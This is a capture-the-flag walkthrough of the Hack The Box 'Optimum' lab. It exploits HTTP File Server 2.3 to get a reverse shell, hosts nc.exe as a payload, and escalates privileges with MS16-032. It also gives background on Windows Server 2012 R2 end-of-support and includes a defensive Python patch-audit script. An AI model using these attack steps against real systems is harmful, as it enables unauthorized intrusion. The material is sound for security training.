Introduction

This article is a step-by-step tutorial on exploiting the Optimum machine from Hack The Box (HTB). We demonstrate how to identify vulnerabilities and exploit them to gain unauthorized access and escalate privileges on a Windows Server 2012 machine.

HackTheBox Optimum Description

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.

Reasons Why Windows Server 2012 R2 Is No Longer Secure:

1. End of Support by Microsoft

  • Mainstream support ended: October 9, 2018
  • Extended support ended: October 10, 2023
  • This means:
    • No security updates
    • No bug fixes
    • No technical support
    • Newly discovered vulnerabilities are left unpatched

2. Unpatched Vulnerabilities

  • Once support ends, any zero-day exploits or publicly disclosed vulnerabilities are not addressed.
  • Tools like Metasploit may already contain known exploits for unpatched systems.
  • Systems become attractive targets for ransomware, lateral movement, and privilege escalation attacks.

3. Incompatibility with Modern Security Protocols

  • Lacks native support for:
    • TLS 1.3
    • Modern cipher suites
    • Credential Guard / Windows Defender Exploit Guard
  • Default crypto implementations are outdated, making secure communication harder.

4. Fails Compliance and Regulatory Standards

  • Outdated systems violate standards like:
    • PCI-DSS
    • HIPAA
    • NIST 800-53
  • Could result in penalties, audit failures, or insurance denials.

5. Unsupported Third-Party Software

  • Newer applications and security tools no longer support Server 2012 R2.
  • Antivirus, backup agents, and EDR tools may drop compatibility, leaving blind spots.

1. Introduction to the Machine

  • The target is a Windows Server 2012 machine named Optimum from Hack The Box.
  • The difficulty level is described as medium.

To properly resolve the machine hostname, the hosts file is edited.

  • Command: sudo nano /etc/hosts → adds 10.10.10.8 optimum.htb
  • The web browser then reveals a file-sharing web interface similar to Dropbox.

2. Initial Reconnaissance

  • An Nmap scan reveals that only port 80 (HTTP) is open, running an HTTP File Server (HFS) 2.3.
  • The web interface resembles a simplified file-sharing service like Dropbox or Google Drive.
  • The goal is to find vulnerabilities due to the outdated server version.

Tool used: nmap to identify services.

Command: nmap -sV -sC -Pn 10.10.10.8
Result: Only port 80 is open, with an HTTP File Server (HFS) visible.

3. Finding an Exploit

The server runs HTTP File Server 2.3. We look for known exploits using SearchSploit.

  • Command: searchsploit -w HFS 2.3
  • Found Exploits:
    • Python RCE: 39161.py
    • Text-based payload: 39160.txt
  • We select a Remote Code Execution (RCE) exploit in Python.
  • The exploit requires setting up a reverse shell connection back to the attacker.

4. Setting Up the Attack Environment

The exploit is downloaded and edited to insert the attacker’s IP and port.

  • Command: sudo nano 39161.py → changes the callback IP to 10.10.14.16 and the port to 443
  • File hosting for nc.exe is set up with:
    • sudo cp nc.exe /var/www/html
    • sudo service apache2 start

5. Exploiting HFS for Remote Access

Command:

  • Listener: nc -nvlp 443
  • Python Server (optional): python3 -m http.server 80

Exploit Run:

  • Command: python 39161.py 10.10.10.8 80
  • A successful RCE returns a shell as user costas.

6. Privilege Escalation

Information about the system is retrieved and fed to Windows Exploit Suggester:

  • Command: systeminfo
  • Save the output to a file: nano sysinfo.txt → paste the system info
  • Update Windows Exploit Suggester: sudo python windows-exploit-suggester.py --update
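
As an added example (not from the original post and not the Windows Exploit Suggester project's own code), here is the defender-side view of the same step: parse a constructed `systeminfo` dump and report which bulletins the host is missing and whether the build is out of support. The bulletin-to-KB mapping is an assumption for illustration.

```python
import re

# Constructed sample of `systeminfo` output (not captured from the page's
# target); only the fields the patch audit needs are kept.
SAMPLE_SYSTEMINFO = """\
Host Name:                 SRV-LEGACY
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
"""

# Assumed bulletin -> fixing-KB mapping, for illustration only; confirm each
# pair against the Microsoft bulletin before relying on it in an audit.
REQUIRED_KBS = {
    "MS16-032": "KB3139914",  # the bulletin named in the walkthrough
    "MS15-051": "KB3045171",
}


def parse_systeminfo(text):
    """Extract OS name, build number and the set of installed KBs."""
    os_name = re.search(r"^OS Name:\s*(.+)$", text, re.M)
    build = re.search(r"^OS Version:.*Build (\d+)", text, re.M)
    hotfixes = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return {
        "os_name": os_name.group(1).strip() if os_name else "",
        "build": int(build.group(1)) if build else 0,
        "hotfixes": hotfixes,
    }

def missing_bulletins(text, required=REQUIRED_KBS):
    """Return the bulletins whose fixing KB is absent from the host."""
    installed = parse_systeminfo(text)["hotfixes"]
    return sorted(b for b, kb in required.items() if kb not in installed)

def audit(text):
    """Summarise exposure: out-of-support OS plus unpatched bulletins."""
    info = parse_systeminfo(text)
    # Build 9600 is Server 2012 R2, which left extended support on 2023-10-10;
    # anything at or below that build is treated as unsupported here.
    out_of_support = info["build"] <= 9600
    return {"out_of_support": out_of_support,
            "missing": missing_bulletins(text)}

if __name__ == "__main__":
    print(audit(SAMPLE_SYSTEMINFO))
```

Feeding a real `systeminfo` capture into `audit()` gives the same answer Windows Exploit Suggester would, but from the patch-management side: which KBs to deploy before the host can be considered protected.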

7. Exploiting Privilege Escalation Vulnerabilities

Exploits are selected based on the system info (e.g., MS16-032). The exploit is downloaded to the victim and executed.

  • PowerShell reverse shell preparation is attempted first; however, PowerShell execution fails on the target, so the binary method is used instead.
  • Running the .exe exploit leads to full SYSTEM access.
  • Command: temp.exe
  • Final validation by reading root.txt.

Key Learning Points

  1. Reconnaissance: Identify open ports and services using tools like Nmap.
  2. Vulnerability Research: Use tools like SearchSploit to find matching exploits for vulnerable services.
  3. Exploit Execution: Customize and run exploits, handle payload delivery, and troubleshoot issues.
  4. Privilege Escalation: Gather system information and use specialized tools to suggest and execute privilege escalation attacks.
  5. Post-Exploitation: Gain administrative control over the machine for full access.

What Should You Do?

  1. Upgrade to Windows Server 2019 or 2022
  2. Migrate workloads to Azure or other cloud platforms
  3. Use Extended Security Updates (ESUs) – expensive and temporary (if still available)
  4. Isolate legacy systems if they cannot be replaced (network segmentation, ACLs)

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
